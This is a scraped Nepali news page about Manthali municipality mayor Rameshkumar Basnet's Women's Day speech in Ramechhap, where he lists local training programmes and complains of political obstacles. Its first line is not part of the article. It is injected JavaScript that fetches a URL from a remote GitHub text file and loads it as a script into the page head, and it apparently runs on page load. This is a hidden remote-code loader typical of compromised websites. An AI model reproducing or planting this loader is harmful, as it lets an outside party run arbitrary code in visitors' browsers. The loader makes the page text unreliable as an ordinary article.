;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
फागुन २४,
रामेछाप । रामेछापको मन्थली नगरपालिकाका नगरप्रमुख रमेशकुमार बस्नेतले नगरपालिकाले गर्व गर्न लाएक काम गरेको बताएका छन् । सोमबार १११ औं श्रमिक अन्तर्राष्ट्रिय नारी दिवसको कार्यक्रमलाई सम्बोधन गर्दै उनले यस्तो बताएका छन् ।
उनले भने-नगरपालिकाको ७ सय ५३ जना वडा अध्यक्षहरु भन्दा म नजिक छु, सबै भन्दा सक्रिय छु, मलाई भेट्न कसलाई गाह्रो छ ? हाम्रो नगरपालिकामा अहिले नगरपालिका नजिकै अपाङ्गभएकाहरुलाई डल बनाउने तालिम भैरहेको छ, त्यस्तै ब्यवसायिक सिलाई कटाई गर्न चाहाने महिलाहरुलाई लक्षित् गरेर ३९० घण्टाको तालिम पनि संचालन भैरहेको छ, लोक सेवा आयोगको तयारी कक्षा संचालन भैरहेको छ, महिलाहरुको ड्राईभिङ् तालिम आज सकियो प्रचारमा कमी भएको छ मेरो नगरमा धेरै काम भएका छन् भने ।
नगर प्रमुख बस्नेतले पछिल्लो राजनीतिक प्रभावले केही काम गर्न समस्या भएको गुनासो गरे । उनले राज्यले सबै दिने तर जोस् र जागंर भने दिन नसक्ने भन्दै सबैले आफैले गर्नु पर्ने भन्दै विकास र समृद्धी गर्ने सबैले भूमिका खेल्नु पर्नेमा जोड्दिए । उनले महिलाहरुलाई सक्रियामा बृद्धि गर्ने सुझाव दिए ।
https://www.facebook.com/ghimimiremilan2018/videos/458499468531458
फेसबुक प्रतिक्रियाहरु